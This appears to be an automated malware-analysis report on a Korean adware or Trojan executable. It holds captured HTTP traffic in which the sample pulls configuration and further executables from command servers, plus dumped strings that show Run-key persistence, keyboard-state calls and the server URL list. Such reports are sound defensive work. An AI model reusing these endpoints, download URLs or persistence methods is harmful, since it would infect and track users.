KOREA,ko,hXXp://kr.search.yahoo.com,hXXp://kr.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,hXXp://search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|CHINA,zh-TW,hXXp://one.cn.yahoo.com,hXXp://one.cn.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|CANADA,ca,hXXp://ca.search.yahoo.com,http://ca.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|FRANCE,fr,http://fr.search.yahoo.com,hXXp://fr.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.yahoo.co.jp,hXXp://search.yahoo.co.jp/search?p=,http://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|KOREA,ko,hXXp://search.naver.com,hXXp://search.naver.com/search.naver?query=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,http://search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.goog
<<
<<< skipped >>>
GET /config/keyword_platinum.asp?user_no=3207&SubName=MAIN HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4784
Content-Type: text/html
Expires: Sat, 24 May 2014 06:16:20 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:19 GMT
[icon][/icon][startpage][/startpage][startpop][/startpop][popup][/popup][adminkeywordpop]N|1024*750|1|..........^±¤°Ã´ëÇà »ç^광고대։사 ###N|1024*750|2|..........^Ű¿öµå±¤°Ã^¤워드광고###N|1024*750|3|http:VVV.naver.com^http:naver.com ###N|1024*750|4|http:VVV.daum.net ###N|1024*750|5|http:kr.yahoo.com ###N|1024*750|6|http:VVV.paran.com ###N|1024*750|7|http:VVV.netmarble.net ###N|1024*750|8|http:VVV.gajai.com ###N|1024*750|9|http:VVV.korea.com^http:VVV.freechal.com^http:VVV.dreamwiz.com ###N|1024*750|10|http:VVV.chol.com^http:kr.msn.com^http:VVV.hanafos.com ###N|1024*750|11|http:VVV.imbc.com^http:VVV.chosun.com^http:VVV.sportsseoul.com^http:VVV.edaily.co.kr ###N|1024*750|12|http:VVV.soribada.com ###N|1024*750|13|http:VVV.hangame.com^http:VVV.sayclub.com ###N|1024*750|14|http:VVV.gmarket.co.kr^http:VVV.interpark.com ###N|1024*750|15|http:VVV.buddybuddy.co.kr ###N|1024*750|16|http:sample.naver.com^................ ###N|1024*750|17|http:zusoo.com^http:VVV.nuguni.com^http:VVV.emdb.co.kr^http:VVV.unitel.co.kr^http:VVV.totalplaza.com ###N|1024*750|18|http:VVV.tworld.co.kr^http:
<<
<<< skipped >>>
GET /Config/ipget.asp?kn=first&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Sat, 24 May 2014 06:16:20 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:20 GMT
....
GET /Config/ipget.asp?kn=every&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Sat, 24 May 2014 06:16:20 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:20 GMT
GET /Config/AdNw/StakePsList.asp?uno=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: hostserver.kr
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAQRDCRT=KMEIBMBAKFAFIMNPPOFAEHIP; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:18 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..http://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..http://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..http://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http://220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http://220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://220.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://220.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.73.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73.162.61..
GET /Download/WinCtrCon.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.4
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 20 May 2014 05:11:20 GMT
Accept-Ranges: bytes
ETag: "b4d8bcefe973cf1:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:13:19 GMT
Content-Length: 106016
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9...9...9.......8...P...?.......8...Rich9...........PE..L...J.zS.................P... .......!.......`....@.........................................................................$V..(....p.................. ...................................................(... ....................................text....O.......P.................. ..`.data........`.......`..............@....rsrc........p.......p..............@..@=..H............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /Config/AdNw/StakePsList.asp?uno=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: hostserver.kr
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAQRDCRT=BEEIBMBAKNIENJHEGGLAKOCO; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:58 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..http://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..http://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..http://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http://220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http://220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://220.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://220.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.73.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73.162.61..
GET /Config/sTakeList.asp?n=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: duzip.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQQBADQDD=FLBMFMBAHOIBJICLEMMMKHCG; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:42 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..http://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..http://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..http://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http://220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http://220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://220.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://220.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.73.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73.162.61..
GET /Download/WinCtrProc.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.2
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 21 May 2014 06:59:48 GMT
Accept-Ranges: bytes
ETag: "9bdb3441c274cf1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:12:32 GMT
Content-Length: 839208
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MTK.,:..,:..,:.~04..,:..33..,:..37..,:.Rich.,:.................PE..L...[O|S.....................P......8r............@.............................................................................(.......................(...................................................0... ....................................text............................... ..`.data....5..........................@....rsrc...............................@..@=..H............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /Config/AdNw/FcTimeLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.24
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQAQTQSD=MJPPEMBALNBLNIODAIBKKEDI; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:28 GMT
5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,http://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|120|Y|Y|Y|Y|Y|Y......
GET /Config/NewConf/ProgramUpdateLab.asp?version=1425 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.24
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDAQAQTQSD=MJPPEMBALNBLNIODAIBKKEDI
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:31 GMT
1425|WinCtrProc.exe..
GET /Config/FormLocation.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.45
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5287
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSBDATDC=ACAOHMBAGONCBDCJCKJNBAHD; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:50 GMT
hXXp://blink.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://cafe.naver.com/CafeRankingSectionList.nhn?|961|C|962|50|R|L|8|8|283#..hXXp://kin.naver.com/db/detail.php?|961|C|962|50|R|L|10|10|283#..hXXp://news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://section.blog.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://sample.naver.com|781|C|870|260|R|L|12|12|255#..hXXp://weather.news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://VVV.naver.com|882|C|882|260|R|L|6|6|255#..hXXp://agora.media.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://agoraplaza.media.daum.net/petition/petition.do?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_blog/_top|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_top/|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_top/layout|978|C|58.34|900|R|L|9|9|430#..http://cafe.daum.net/_c21_/cafefocus_list?|978|C|58.34|900|R|L|9|9|430#..http://cafe.daum.net/_ranking/rank_top100_1.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/support/cafesupport.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/brand/brandstar.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/event/event_list.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/_bbs/0noti/bbs_read?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/?_top_blogtop=navi_cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/top/top.html?_top_cafetop=cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cartoon.media.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://issue.media.daum.ne
<<
<<< skipped >>>
GET /Config/AdNw/FcPimSLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.45
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSBDATDC=ACAOHMBAGONCBDCJCKJNBAHD
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:51 GMT
5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,http://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|120|Y|Y|Y|Y|Y|Y......
GET /Config/newConf/UCg_LPrMLab.asp?user_no=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.45
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSBDATDC=ACAOHMBAGONCBDCJCKJNBAHD
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 396
Content-Type: text/html
Expires: Sat, 24 May 2014 06:15:52 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:51 GMT
KOREA|Y|N|N|Y|hXXp://kr.search.yahoo.com/search?fr=clickstory_kr_synd_search&ovt=A_P_AB_cityfriend_5&p=|Y|N|N|0|hXXp://220.73.162.58/config/LanguageTranslate.asp?hl=[u]&sl=[u]&tl=[1]&p=[KEYWORD]|name="p" value=,16|hXXp://kr.dictionary.search.yahoo.com/search/dictionaryp?subtype=[1]&prop=7&p=[KEYWORD]|50|N|N|N|0|hXXp://VVV.hebogo.com/search/csearch.asp|N|0|N|0|Y|N|N|N|N|Y|Y|Y|0|N|ALRIM|Y|N|N|N|....
GET /Config/TransSiteString.asp?nation=KOREA HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.45
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSBDATDC=ACAOHMBAGONCBDCJCKJNBAHD
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12071
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:52 GMT
KOREA,ko,hXXp://kr.search.yahoo.com,hXXp://kr.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,hXXp://search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|CHINA,zh-TW,hXXp://one.cn.yahoo.com,hXXp://one.cn.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|CANADA,ca,hXXp://ca.search.yahoo.com,http://ca.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|FRANCE,fr,http://fr.search.yahoo.com,hXXp://fr.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.yahoo.co.jp,hXXp://search.yahoo.co.jp/search?p=,http://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|KOREA,ko,hXXp://search.naver.com,hXXp://search.naver.com/search.naver?query=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,http://search.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.goog
<<
<<< skipped >>>
GET /Download/WinCtrProc.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.2
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 21 May 2014 06:59:48 GMT
Accept-Ranges: bytes
ETag: "9bdb3441c274cf1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:12:13 GMT
Content-Length: 839208
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MTK.,:..,:..,:.~04..,:..33..,:..37..,:.Rich.,:.................PE..L...[O|S.....................P......8r............@.............................................................................(.......................(...................................................0... ....................................text............................... ..`.data....5..........................@....rsrc...............................@..@=..H............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /Config/sTakeList.asp?n=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: korserver.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCTBAQCB=ELBDJMBAOJDMCHFOOEOKPIGB; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:49 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..http://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..http://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..http://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http://220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http://220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://220.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://220.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.73.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73.162.61..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
WinCtrProc.exe_2504:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
InetCtlsObjects.Inet
InetCtlsObjects.Inet
WebBrowser1
WebBrowser1
SHDocVwCtl.WebBrowser
SHDocVwCtl.WebBrowser
vb6ko.dll
vb6ko.dll
shdocvw.dll
shdocvw.dll
WebBrowser
WebBrowser
MSINET.OCX
MSINET.OCX
KeywordForm
KeywordForm
shell32.dll
shell32.dll
ShellExecuteA
ShellExecuteA
GetKeyState
GetKeyState
EnumWindows
EnumWindows
GetAsyncKeyState
GetAsyncKeyState
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
1%System%\MSINET.oca
1%System%\MSINET.oca
%System%\ieframe.oca
%System%\ieframe.oca
GetWindowsDirectoryA
GetWindowsDirectoryA
UpdateLayeredWindows
UpdateLayeredWindows
User32.DLL
User32.DLL
WSOCK32.DLL
WSOCK32.DLL
vb6stkit.dll
vb6stkit.dll
GetKeyboardState
GetKeyboardState
URLEncode
URLEncode
VBA6.DLL
VBA6.DLL
advapi32.dll
advapi32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegOpenKeyA
RegOpenKeyA
%System%\msvbvm60.dll\3
%System%\msvbvm60.dll\3
kernel32.dll
kernel32.dll
WinExec
WinExec
2008:02:21 11:10:24
2008:02:21 11:10:24
urlTEXT
urlTEXT
MsgeTEXT
MsgeTEXT
Hhttp://ns.adobe.com/xap/1.0/
Hhttp://ns.adobe.com/xap/1.0/
<x:xapmeta xmlns:x="adobe:ns:meta/" x:xaptk="XMP toolkit 2.8.2-33, framework 1.5"></x:xapmeta>
<x:xapmeta xmlns:x="adobe:ns:meta/" x:xaptk="XMP toolkit 2.8.2-33, framework 1.5"></x:xapmeta>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:iX="http://ns.adobe.com/iX/1.0/"></rdf:RDF>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:iX="http://ns.adobe.com/iX/1.0/"></rdf:RDF>
<rdf:Description about="uuid:25326700-e021-11dc-8e7f-a474304460f4"><pre>xmlns:xapMM='http://ns.adobe.com/xap/1.0/mm/'></pre><pre><xapMM:DocumentID>adobe:docid:photoshop:253266fe-e021-11dc-8e7f-a474304460f4</xapMM:DocumentID></pre><pre>http://</pre><pre>http:///</pre><pre>\WinApp\VoeyQdhGdowq\WinCtrPrc\WinFormProcess.vbp</pre><pre>78E1BDD1-9941-11cf-9756-00AA00C00908</pre><pre>http://micronames.co.kr/Download,http://220.73.162.2/Download,http://220.73.162.3/Download,http://220.73.162.4/Download</pre><pre>3.asp</pre><pre>2.asp</pre><pre>/config/formactive.asp?uno=</pre><pre>&url=</pre><pre>&keyword=</pre><pre>&keyno=</pre><pre>&kind=PORTAL</pre><pre>microsoft.com</pre><pre>/config/FormActive.asp?uno=</pre><pre>/config/FormActive_Distinct.asp?uno=</pre><pre>/config/Formactive_Distinct.asp?uno=</pre><pre>st.asp?uno=</pre><pre>&kind=KEYWORD</pre><pre>/Config/FormLocation.asp</pre><pre>/Config/AdNw/FcPimSLab.asp</pre><pre>/Config/newConf/UCg_LPrMLab.asp?user_no=</pre><pre>/Config/TransSiteString.asp?nation=</pre><pre>/Config/FileNameDataMicro.asp</pre><pre>SetDownValue.asp?uno=</pre><pre>software\microsoft\windows\currentversion\run</pre><pre>/Config/UrlEncodeDecode.asp?q=</pre><pre>/Config/MakeStartPage.asp?uno=</pre><pre>&key=</pre><pre>?keyword=</pre><pre>?key=</pre><pre>keyword=</pre><pre>/Config/MakeSearchPage.asp?uno=</pre><pre>/Config/MakeIcon.asp?uno=</pre><pre>[KEYWORD]</pre><pre>/Config/TargetDataConnect.asp?p=&uno=</pre><pre>/Config/MakeProgram.asp?uno=</pre><pre>%Program Files%\micrOLAb\SearchEngin\LanguageConvert</pre><pre>http://maketop.kr</pre><pre>/Config/ServerList.asp?uno=</pre><pre>http://korserver.com</pre><pre>http://koreaserver.kr</pre><pre>http://domainserver.co.kr</pre><pre>http://hostserver.kr</pre><pre>http://mainserver.kr</pre><pre>http://makevalue.com</pre><pre>http://duzip.com</pre><pre>http://itemprice.kr</pre><pre>2000-10-01</pre><pre>Software\Microsoft\Windows\currentversion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>http://azgogo.net/download</pre><pre>VB6KO.DLL</pre><pre>msvbvm60.dll</pre><pre>wshom.ocx</pre><pre>ERROR_URL</pre><pre>/advertisebanner/keyword/</pre><pre>/advertisedistinct/keyword/</pre><pre>InternetExplorer.Application</pre><pre>/Config/Pop_Key_MainPlatinum.asp?uno=</pre><pre>keyboard</pre><pre>/Config/Pop_Key_MainDistinct.asp?uno=</pre><pre>&distinct=keyword</pre><pre>error_url</pre><pre>http://www.naver.com</pre><pre>/Config/ipget.asp?kn=first&usd=</pre><pre>Windows 32s</pre><pre>Windows 95/98</pre><pre>Windows NT</pre><pre>/config/keyword_platinum.asp?user_no=</pre><pre>[adminkeywordpop]</pre><pre>[/adminkeywordpop]</pre><pre>[keywordpop]</pre><pre>[/keywordpop]</pre><pre>/Config/ipget.asp?kn=every&usd=</pre><pre>Software\Microsoft\Windows\Currentversion\Run</pre><pre>MicroProCon.exe</pre><pre>MicroProProc.exe</pre><pre>RetainPt.exe</pre><pre>RetainComp.exe</pre><pre>in.asp?uno=</pre><pre>Software\Microsoft\Windows\currentversion\run</pre><pre>00000001</pre><pre>00000060</pre><pre>.asp?version=</pre><pre>.asp?user_no=</pre><pre>.asp?uno=</pre><pre>Error getting subkey value.</pre><pre>/Config/GuideSiteString.asp?p=</pre><pre>.dictionary</pre><pre>dic.daum</pre><pre>dic.naver</pre><pre>dic.nate</pre><pre>http:</pre><pre>https:</pre><pre>로</pre><pre>ì„</pre><pre>e.asp?p=</pre><pre>.asp?p=</pre><pre>roLab.asp?p=</pre><pre>Code.asp?p=</pre><pre>https://</pre><pre>ode.asp?uno=</pre><pre>/Config/KeySt</pre><pre>ab.asp?p=</pre><pre>/Config/SiteLink_Code.asp?uno=</pre><pre>/Config/ConvertLanguagemicrOLAb.asp?p=</pre><pre>/Config/OvertureDataConnect.asp?p=&uno=</pre><pre>/Config/RankeyLink_Code.asp?uno=</pre><pre>/advertisebanner/keyword</pre><pre>/advertisedistinct/keyword</pre><pre>JOIN</pre><pre>KEYWORD</pre><pre>\Internet Explorer\iexplore.exe</pre><pre>WScript.Shell</pre><pre>%Program 